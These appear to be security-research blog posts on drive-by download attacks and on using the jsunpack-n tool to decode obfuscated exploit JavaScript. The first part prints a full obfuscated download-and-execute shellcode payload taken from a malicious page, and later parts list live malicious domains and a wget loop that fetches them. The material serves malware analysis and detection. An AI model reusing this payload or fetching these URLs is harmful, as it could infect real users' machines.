BETA can convert raw binary shellcode into text that can be used in exploit source-code. It can convert raw binary data to a large number of encodings. It can also do the reverse: decode encoded data into binary from the same types of encodings. The official page where you can download it can be found here.

Exploit Tool kit’s out in the wild often utilize Download and execute shell-code which when run on the end system downloads and executes a file to allow the attacker to control the system. This is commonly used in Drive By Download attacks where a victim visits a malicious web page that in turn attempts to execute the shell-code in order to install software on the victim’s machine.

More often then not the shell-code is buried within obfuscated javascript. Searching the Murls database reveals one such URL (hxxp://rrrxgvdf.6600.org/kuaile/19.htm).

The above image visualizes the series of redirects that occur via Iframe tags after the victim browses to (hxxp://rrrxgvdf.6600.org/kuaile/19.htm). The example below was found at the following URL. (wm.yxnjs.com_x148_of.js) This shows a simple form of obfuscation where they substitute “%u” for “MTV”

Example of Obfuscated Shellcode
var MTV=”%u”;<br /> var YT=unescape;<br /> var s=YT(MTV+”E8″+”90″+MTV+”034D”+MTV+”0000″+MTV+”0068″+MTV+”0020″+MTV+”6A00″+MTV+”FF00″+MTV+”B9D0″+MTV+”0800″+MTV+”0000″+MTV+”F88B”+MTV+”05EB”+MTV+”F35E”+MTV+”FFA4″+MTV+”E8D0″+MTV+”FFF6″+MTV+”FFFF”+MTV+”54E8″);</p> <p>s+=YT(MTV+”0003″+MTV+”8B00″+MTV+”E8F8″+MTV+”0038″+MTV+”0000″+MTV+”64E8″+MTV+”0001″+MTV+”E800″+MTV+”0046″+MTV+”0000″+MTV+”F2E8″+MTV+”0003″+MTV+”8B00″+MTV+”E8F8″+MTV+”0022″+MTV+”0000″+MTV+”5BE8″+MTV+”0001″+MTV+”E800″);<br /> s+=YT(MTV+”0030″+MTV+”0000″+MTV+”A0E8″+MTV+”0003″+MTV+”8B00″+MTV+”E8F8″+MTV+”000C”+MTV+”0000″+MTV+”78E8″+MTV+”0001″+MTV+”E800″+MTV+”001A”+MTV+”0000″+MTV+”58EB”+MTV+”8B53″+MTV+”53DC”+MTV+”406A”+MTV+”0068″+MTV+”0010″);<br /> s+=YT(MTV+”5700″+MTV+”C8E8″+MTV+”0002″+MTV+”E800″+MTV+”00FA”+MTV+”0000″+MTV+”C358″+MTV+”8B53″+MTV+”53DC”+MTV+”206A”+MTV+”0068″+MTV+”0010″+MTV+”5700″+MTV+”B0E8″+MTV+”0002″+MTV+”E800″+MTV+”00E2″+MTV+”0000″+MTV+”C358″);</p> <p>s+=YT(MTV+”E857″+MTV+”0453″+MTV+”0000″+MTV+”F88B”+MTV+”C933″+MTV+”3349″+MTV+”B0C0″+MTV+”FCC3″+MTV+”AEF2″+MTV+”478D”+MTV+”5FFF”+MTV+”5BC3″+MTV+”C63E”+MTV+”B807″+MTV+”893E”+MTV+”015F”+MTV+”3E66″+MTV+”47C7″+MTV+”FF05″);</p> <p>s+=YT(MTV+”C3E0″+MTV+”ACE9″+MTV+”0004″+MTV+”5B00″+MTV+”EC81″+MTV+”0114″+MTV+”0000″+MTV+”D48B”+MTV+”C73E”+MTV+”6302″+MTV+”646D”+MTV+”3E20″+MTV+”42C7″+MTV+”2F04″+MTV+”2063″+MTV+”3E22″);</p> <p>s+=YT(MTV+”42C7″+MTV+”6308″+MTV+”646D”+MTV+”3E20″+MTV+”42C7″+MTV+”2F0C”+MTV+”2063″+MTV+”8322″+MTV+”10C2″+MTV+”C033″+MTV+”5050″+MTV+”0468″+MTV+”0001″+MTV+”5200″+MTV+”5053″+MTV+”C8E8″+MTV+”0003″);<br /> s+=YT(MTV+”E800″+MTV+”0072″+MTV+”0000″+MTV+”FC8B”+MTV+”C78B”+MTV+”C083″+MTV+”3E08″+MTV+”188A”+MTV+”DB84″+MTV+”0374″+MTV+”EB40″+MTV+”66F6″+MTV+”C73E”+MTV+”2200″+MTV+”3322″+MTV+”3ED2″+MTV+”5088″);</p> <p>s+=YT(MTV+”8302″+MTV+”54EC”+MTV+”C033″+MTV+”DB33″+MTV+”CC8B”+MTV+”F883″+MTV+”7D54″+MTV+”3E09″+MTV+”1C89″+MTV+”8308″+MTV+”04C0″+MTV+”F2EB”+MTV+”CC8B”+MTV+”D98B”+MTV+”C383″+MTV+”3310″+MTV+”3EC0″);</p> <p>s+=YT(MTV+”43C7″+MTV+”012C”+MTV+”0000″+MTV+”5100″+MTV+”5053″+MTV+”5050″+MTV+”5050″+MTV+”5750″+MTV+”E850″+MTV+”033B”+MTV+”0000″+MTV+”19E8″+MTV+”0000″+MTV+”6400″+MTV+”04A1″+MTV+”0000″+MTV+”8D00″);</p> <p>s+=YT(MTV+”60A0″+MTV+”FFFF”+MTV+”E8FF”+MTV+”0339″+MTV+”0000″+MTV+”DB33″+MTV+”5353″+MTV+”5353″+MTV+”D0FF”+MTV+”3880″+MTV+”74E9″+MTV+”8005″+MTV+”E838″+MTV+”0F75″+MTV+”7881″+MTV+”9005″+MTV+”4190″);<br /> s+=YT(MTV+”7490″+MTV+”5506″+MTV+”EC8B”+MTV+”408D”+MTV+”FF05″+MTV+”E8E0″+MTV+”FF17″+MTV+”FFFF”+MTV+”E8C3″+MTV+”FF11″+MTV+”FFFF”+MTV+”11B8″+MTV+”0401″+MTV+”C280″+MTV+”000C”+MTV+”04E8″+MTV+”FFFF”);<br /> s+=YT(MTV+”33FF”+MTV+”50C0″+MTV+”E854″+MTV+”0054″+MTV+”0000″+MTV+”E850″+MTV+”028B”+MTV+”0000″+MTV+”D0FF”+MTV+”8036″+MTV+”243C”+MTV+”7700″+MTV+”E80A”+MTV+”0241″+MTV+”0000″+MTV+”FF33″+MTV+”FF57″);<br /> s+=YT(MTV+”E8D0″+MTV+”01FB”+MTV+”0000″+MTV+”FF68″+MTV+”0000″+MTV+”FF00″+MTV+”E8D0″+MTV+”FED1″+MTV+”FFFF”+MTV+”5753″+MTV+”3356″+MTV+”50C0″+MTV+”E854″+MTV+”001E”+MTV+”0000″+MTV+”E850″+MTV+”0255″);</p> <p>s+=YT(MTV+”0000″+MTV+”D0FF”+MTV+”8036″+MTV+”243C”+MTV+”7700″+MTV+”E80A”+MTV+”020B”+MTV+”0000″+MTV+”FF33″+MTV+”FF57″+MTV+”58D0″+MTV+”5F5E”+MTV+”C35B”+MTV+”02EB”+MTV+”C358″+MTV+”F9E8″+MTV+”FFFF”);<br /> s+=YT(MTV+”56FF”+MTV+”8357″+MTV+”08EC”+MTV+”FC8B”+MTV+”086A”+MTV+”3E57″+MTV+”77FF”+MTV+”E814″+MTV+”025D”+MTV+”0000″+MTV+”D0FF”+MTV+”FC8B”+MTV+”6168″+MTV+”656D”+MTV+”6800″+MTV+”4549″+MTV+”7246″);</p> <p>s+=YT(MTV+”F48B”+MTV+”08B9″+MTV+”0000″+MTV+”F300″+MTV+”75A6″+MTV+”6A2F”+MTV+”3E00″+MTV+”74FF”+MTV+”2024″+MTV+”24E8″+MTV+”0002″+MTV+”FF00″+MTV+”8BD0″+MTV+”E8F8″+MTV+”01CB”+MTV+”0000″+MTV+”D0FF”);<br /> s+=YT(MTV+”F83B”+MTV+”0874″+MTV+”8B36″+MTV+”2444″+MTV+”3E20″+MTV+”00FF”+MTV+”FF3E”+MTV+”2474″+MTV+”E81C”+MTV+”01EF”+MTV+”0000″+MTV+”D0FF”+MTV+”C483″+MTV+”5F10″+MTV+”B85E”+MTV+”0001″+MTV+”0000″);<br /> s+=YT(MTV+”68C3″+MTV+”6E6F”+MTV+”0000″+MTV+”7568″+MTV+”6C72″+MTV+”EB6D”+MTV+”8D15″+MTV+”2444″+MTV+”5004″+MTV+”0BE8″+MTV+”FFFE”+MTV+”50FF”+MTV+”4AE8″+MTV+”0002″+MTV+”E900″+MTV+”FEE0″+MTV+”FFFF”);</p> <p>s+=YT(MTV+”E6E8″+MTV+”FFFF”+MTV+”83FF”+MTV+”08C4″+MTV+”6AC3″+MTV+”686C”+MTV+”746E”+MTV+”6C64″+MTV+”15EB”+MTV+”448D”+MTV+”0424″+MTV+”E850″+MTV+”FDE4″+MTV+”FFFF”+MTV+”E850″+MTV+”0223″+MTV+”0000″);<br /> s+=YT(MTV+”B9E9″+MTV+”FFFE”+MTV+”E8FF”+MTV+”FFE6″+MTV+”FFFF”+MTV+”C483″+MTV+”C308″+MTV+”3368″+MTV+”0032″+MTV+”6800″+MTV+”7375″+MTV+”7265″+MTV+”15EB”+MTV+”448D”+MTV+”0424″+MTV+”E850″+MTV+”FDBA”);<br /> s+=YT(MTV+”FFFF”+MTV+”E850″+MTV+”01F9″+MTV+”0000″+MTV+”8FE9″+MTV+”FFFE”+MTV+”E8FF”+MTV+”FFE6″+MTV+”FFFF”+MTV+”C483″+MTV+”C308″+MTV+”6368″+MTV+”7776″+MTV+”6800″+MTV+”6873″+MTV+”6F64″+MTV+”15EB”);<br /> s+=YT(MTV+”448D”+MTV+”0424″+MTV+”E850″+MTV+”FD90″+MTV+”FFFF”+MTV+”E850″+MTV+”01CF”+MTV+”0000″+MTV+”65E9″+MTV+”FFFE”+MTV+”E8FF”+MTV+”FFE6″+MTV+”FFFF”+MTV+”C483″+MTV+”C308″+MTV+”7668″+MTV+”7867″);</p> <p>s+=YT(MTV+”EB00″+MTV+”8D15″+MTV+”2444″+MTV+”5004″+MTV+”6BE8″+MTV+”FFFD”+MTV+”50FF”+MTV+”AAE8″+MTV+”0001″+MTV+”E900″+MTV+”FE40″+MTV+”FFFF”+MTV+”E6E8″+MTV+”FFFF”+MTV+”83FF”+MTV+”04C4″+MTV+”E8C3″);</p> <p>s+=YT(MTV+”01AB”+MTV+”0000″+MTV+”1B68″+MTV+”46C6″+MTV+”5079″+MTV+”C6E8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”0197″+MTV+”0000″+MTV+”EC68″+MTV+”0397″+MTV+”500C”+MTV+”B2E8″+MTV+”0001″);</p> <p>s+=YT(MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”0183″+MTV+”0000″+MTV+”AA68″+MTV+”0DFC”+MTV+”507C”+MTV+”9EE8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”016F”+MTV+”0000″+MTV+”ED68″+MTV+”EF56″);</p> <p>s+=YT(MTV+”5036″+MTV+”8AE8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”015B”+MTV+”0000″+MTV+”F068″+MTV+”048A”+MTV+”505F”+MTV+”76E8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FEF7″);<br /> s+=YT(MTV+”FFFF”+MTV+”7868″+MTV+”DB68″+MTV+”501C”+MTV+”62E8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”0133″+MTV+”0000″+MTV+”EF68″+MTV+”E0CE”+MTV+”5060″+MTV+”4EE8″+MTV+”0001″+MTV+”8300″);</p> <p>s+=YT(MTV+”08C4″+MTV+”E8C3″+MTV+”011F”+MTV+”0000″+MTV+”B068″+MTV+”2D49″+MTV+”50DB”+MTV+”3AE8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FF36″+MTV+”FFFF”+MTV+”AB68″+MTV+”9B5E”+MTV+”501E”);</p> <p>s+=YT(MTV+”26E8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FEA7″+MTV+”FFFF”+MTV+”5968″+MTV+”8197″+MTV+”5002″+MTV+”12E8″+MTV+”0001″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”00E3″+MTV+”0000″);</p> <p>s+=YT(MTV+”7E68″+MTV+”E2D8″+MTV+”5073″+MTV+”FEE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”00CF”+MTV+”0000″+MTV+”9E68″+MTV+”BBF9″+MTV+”5035″+MTV+”EAE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″);<br /> s+=YT(MTV+”E8C3″+MTV+”FE92″+MTV+”FFFF”+MTV+”5768″+MTV+”B5A0″+MTV+”50BB”+MTV+”D6E8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FE7E”+MTV+”FFFF”+MTV+”1A68″+MTV+”1E7A”+MTV+”5002″+MTV+”C2E8″+MTV+”0000″);</p> <p>s+=YT(MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FE6A”+MTV+”FFFF”+MTV+”E068″+MTV+”305B”+MTV+”5094″+MTV+”AEE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FE56″+MTV+”FFFF”+MTV+”9768″+MTV+”E2C9″);</p> <p>s+=YT(MTV+”50A3″+MTV+”9AE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FE42″+MTV+”FFFF”+MTV+”6868″+MTV+”C524″+MTV+”50B3″+MTV+”86E8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”0057″);<br /> s+=YT(MTV+”0000″+MTV+”7268″+MTV+”B3FE”+MTV+”5016″+MTV+”72E8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”E8C3″+MTV+”FE44″+MTV+”FFFF”+MTV+”13EB”+MTV+”656A”+MTV+”E850″+MTV+”FBE0″+MTV+”FFFF”+MTV+”E850″);<br /> s+=YT(MTV+”FEAB”+MTV+”FFFF”+MTV+”B5E9″+MTV+”FFFC”+MTV+”E8FF”+MTV+”FFE8″+MTV+”FFFF”+MTV+”E8C3″+MTV+”FDA9″+MTV+”FFFF”+MTV+”4F68″+MTV+”4FEF”+MTV+”5005″+MTV+”3EE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″);<br /> s+=YT(MTV+”E8C3″+MTV+”000F”+MTV+”0000″+MTV+”8E68″+MTV+”0E4E”+MTV+”50EC”+MTV+”2AE8″+MTV+”0000″+MTV+”8300″+MTV+”08C4″+MTV+”33C3″+MTV+”64C0″+MTV+”408B”+MTV+”8530″+MTV+”78C0″+MTV+”3E10″+MTV+”408B”);<br /> s+=YT(MTV+”3E0C”+MTV+”708B”+MTV+”AD1C”+MTV+”8B3E”+MTV+”0840″+MTV+”EBC3″+MTV+”3E0B”+MTV+”408B”+MTV+”8334″+MTV+”7CC0″+MTV+”8B3E”+MTV+”3C40″+MTV+”60C3″+MTV+”8B36″+MTV+”246C”+MTV+”3624″+MTV+”458B”);</p> <p>s+=YT(MTV+”363C”+MTV+”548B”+MTV+”7828″+MTV+”D503″+MTV+”8B3E”+MTV+”184A”+MTV+”8B3E”+MTV+”205A”+MTV+”DD03″+MTV+”3BE3″+MTV+”3E49″+MTV+”348B”+MTV+”038B”+MTV+”33F5″+MTV+”33FF”+MTV+”FCC0″+MTV+”84AC”);</p> <p>s+=YT(MTV+”74C0″+MTV+”C107″+MTV+”0DCF”+MTV+”F803″+MTV+”F4EB”+MTV+”3B36″+MTV+”247C”+MTV+”7528″+MTV+”3EDF”+MTV+”5A8B”+MTV+”0324″+MTV+”66DD”+MTV+”8B3E”+MTV+”4B0C”+MTV+”8B3E”+MTV+”1C5A”+MTV+”DD03″);<br /> s+=YT(MTV+”8B3E”+MTV+”8B04″+MTV+”C503″+MTV+”8936″+MTV+”2444″+MTV+”611C”+MTV+”E8C3″+MTV+”FB4F”+MTV+”FFFF”);</p> <p>var c=s+u;<br />

Exploits that target browsers commonly encode shellcode in a JavaScript string using Percent-encoding, “%uXXXX”-encoding or entity encoding. Some exploits also obfuscate the encoded shellcode string further to prevent detection by IDS. The example above is one such example of obfuscation because they are substituting the characters MTV with %u and in this case utilizing percent encoding.

Thanks to David Zimmer over at Idefense the following tool can be used to investigate shell-code either by static or dynamic analysis. Before we can do that we have to clean up the code by replacing MTV with %u and eliminating everything so that we have a “%uXXXX” format. Once the code is all cleaned up you can submit it here The script will then return you a file named shecode.exe_ (the underscore is so that you dont execute it by accident). After saving to the desktop you can then submit to Virus Total, open in your debugger/disassembler or submit to Anubis for a behavioral analysis.

Virus Total Report
Threatexpert Report

A new version of Jsunpack-n was posted recently and i have finally got around to installing it. There are some very cool new features such as

1) improved URL tracking using ‘urlattr’ class and urls dictionary
1a) new command line option -g, to create a URL graph (only when pcap contains 10 or fewer URL requests)

2) bug fixes for stream reassembly and pdf parsing
2a) stream reassembly now handles all streams when processing a pcap file, regardless of whether the nids state is in end_states
4) detection of NOP sled shellcode and performance improvements in shellcode processing (this was one of the performance bottlenecks)
5) new output format with ./files/ directory or -d OUTDIR command line option
6) CVE references are available in the ‘rules’ file but are temporarily unavailable in alerts

One of the major differences is this release is dependent on Yara.. Before you attempt to install Yara make sure you install PCRE by running the following command

apt-get install libpcre3 libpcre3-dev

Now download the following files

1) http://yara-project.googlecode.com/files/yara-1.2.1.tar.gz
2) http://yara-project.googlecode.com/files/yara-python-1.2.1.tar.gz

For yara-python-1.2.1.tar.gz you can build by running the following commands

$ tar xzvf yara-python-1.2.0.tar.gz
$ cd yara-python-1.2.0
$ python setup.py build
$ sudo python setup.py install

And then for yara-1.2.1.tar.gz simply run

$ tar xzvf yara-1.2.1.tar.gz
$ cd yara-1.2.1
$ sudo ./configure; make; make install

Next run the following commands

$ sudo echo “/usr/local/lib” >> /etc/ld.so.conf
$ sudo ldconfig

I then ran jsunpack-n against one the sample .pcap files with the new -g option to generate an image file however immediately received the following error

sudo ./jsunpack-n.py sample-http-exploit.pcap -g url
Traceback (most recent call last):
File “./jsunpack-n.py”, line 1030, in
main()
File “./jsunpack-n.py”, line 1026, in main
graph(file, js.urls, options.graphfile)
File “./jsunpack-n.py”, line 924, in graph
import yapgvb
ImportError: No module named yapgvb

The error is from a missing python module which can easily be installed by running the following command.

apt-get install python-yapgvb

Now that everything is working I scraped MalwareURL.com for the most recently IPs/Domains associated with Exploits by using the following command.

links2 -dump http://www.malwareurl.com/search.php?domain=\&s=exploits\&match=0\&rp=100\&urls=on\&redirs=on\&ip=on\&reverse=on\&as=on | awk ‘{print $1}’ | sed ‘s/|//’ | egrep “[A-Za-z0-9\/]” | awk ‘{print “http://”$1}’ >> t3stURLS.txt

The result of the command stores a list of URLs into a file called t3stURLS.txt while running jsunpack-n in the background we can use wget to loop through the file t3stURLS.txt and download the content to see what gets picked up and decoded.

wget -i t3stURLS.txt -T 1 -t 3

Below is a small sample of the Jsunpack Output that was generated.

*Caution Malicious URLS*

[suspicious:5] 55x5h.2288.org/fkzd/2.htm
[impact=5] DecodedIframe  detected <iframe
[info] [iframe http] http://wm.7udij.cn/x87/xx.html
[info] [script http] http://js.tongji.linezing.com/1240663/tongji.js
[suspicious:5] wm.7udij.cn/x87/xx.html
[impact=5] DecodedIframe  detected <iframe
[info] [iframe .] wm.7udij.cn/x87/Td14.htm
[info] [iframe .] wm.7udij.cn/x87/yt.htm
[info] [iframe .] wm.7udij.cn/x87/td09.htm
[info] [iframe .] wm.7udij.cn/x87/yut.htm
[suspicious:5] 44x5h.2288.org/fkzd/2.htm
[impact=5] DecodedIframe  detected <iframe
[info] [iframe http] http://wm.7udij.cn/x87/xx.html
[info] [script http] http://js.tongji.linezing.com/1240663/tongji.js
[suspicious:5] wm.6bief.cn/x3/xx.html
[impact=5] DecodedIframe  detected <iframe
[info] [iframe .] wm.6bief.cn/x3/Td14.htm
[info] [iframe .] wm.6bief.cn/x3/yt.htm
[info] [iframe .] wm.6bief.cn/x3/td09.htm
[info] [iframe .] wm.6bief.cn/x3/yut.htm

As you can see from the output above jsunpack-n was able to decode the obfuscated JavaScript and output the Iframes that were buried within. Because I am using Wget the Iframes are not followed so this test only touches on some of the functionality jsunpack-n provides. Originally I believe jsunpack-n was developed to act as an IDS application however it can also be used for research purposes.

The New file directory now organizes the decodings by MD5 and also saves the executables.
decoding_048c802efcc40b164a42cf29c95ad9e13cf28995
decoding_742d479309d69fd4bc7353647cc66f5cc9418bf9
decoding_d6641a882f77807034ff0a1f5530b1b781ee1019
original_86c2d76a7ba524487ab518c7fae29dcc60c6fc54
decoding_17278448f71fbb774fd420d6bb6dc9f1bf1d8689
decoding_75d715bee572a79d9fba6bae2fff79cf2cb1620d
decoding_f867d1bc0da9a69c286131639f474a5c2521f46d

This tool has come along way and has become one of my favorite. Many thanks to the author for sharing with everyone in the community.